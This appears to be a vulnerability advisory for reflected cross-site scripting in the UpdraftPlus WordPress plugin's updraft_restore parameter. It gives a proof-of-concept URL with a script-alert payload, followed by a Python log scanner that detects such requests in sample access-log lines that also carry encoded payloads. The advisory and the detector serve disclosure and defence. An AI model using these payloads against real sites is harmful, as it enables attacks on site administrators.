EPSS Percentile: 41.8%
The plugin does not sanitise and escape the updraft_restore parameter before outputting it back in the Restore page, leading to a Reflected Cross-Site Scripting issue.
https://example.com/wp-admin/options-general.php?page=updraftplus&job_id&updraft_restore[0]=<script>alert(/XSS/)<%2Fscript>&action=updraft_restore&backup_timestamp=123&updraftplus_ajax_restore=start_ajax_restore
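A log check for requests of the shape shown above, given as an added example that is not part of the original advisory or the plugin's code. It assumes a combined-format access log; the sample lines, function names and decoding depth are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample lines in combined access-log format (not from the advisory).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2022:10:00:00 +0000] "GET /wp-admin/options-general.php'
    '?page=updraftplus&updraft_restore[0]=%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E'
    '&action=updraft_restore HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2022:10:01:00 +0000] "GET /wp-admin/options-general.php'
    '?page=updraftplus&updraft_restore[0]=db&updraft_restore[1]=plugins HTTP/1.1" 200 4800',
    '203.0.113.9 - - [01/Jan/2022:10:02:00 +0000] "GET /wp-admin/options-general.php'
    '?page=updraftplus&updraft_restore%5B0%5D=%253Cb%253E HTTP/1.1" 200 5001',
    '198.51.100.8 - - [01/Jan/2022:10:03:00 +0000] "GET /?s=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
HTML_META = re.compile(r'[<>"\']')  # characters that matter when echoed unescaped

def fully_decode(value, rounds=3):
    """Undo layered percent-encoding (e.g. %253C) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_restore_params(request_target):
    """Return (name, decoded value) for updraft_restore values carrying HTML markup."""
    query = request_target.partition("?")[2]
    params = parse_qsl(query, keep_blank_values=True)  # decodes names and values once
    if ("page", "updraftplus") not in params:
        return []
    hits = []
    for name, value in params:
        if name.split("[", 1)[0] == "updraft_restore":
            value = fully_decode(value)
            if HTML_META.search(value):
                hits.append((name, value))
    return hits

def scan(lines):
    """Return (client, parameter, decoded value) for every suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            client = line.split()[0]
            findings += [(client, n, v) for n, v in suspicious_restore_params(match.group(1))]
    return findings
```

Legitimate restore requests carry plain component names in updraft_restore, so any hit from `scan` on the settings page is worth reviewing alongside the plugin version installed at the time.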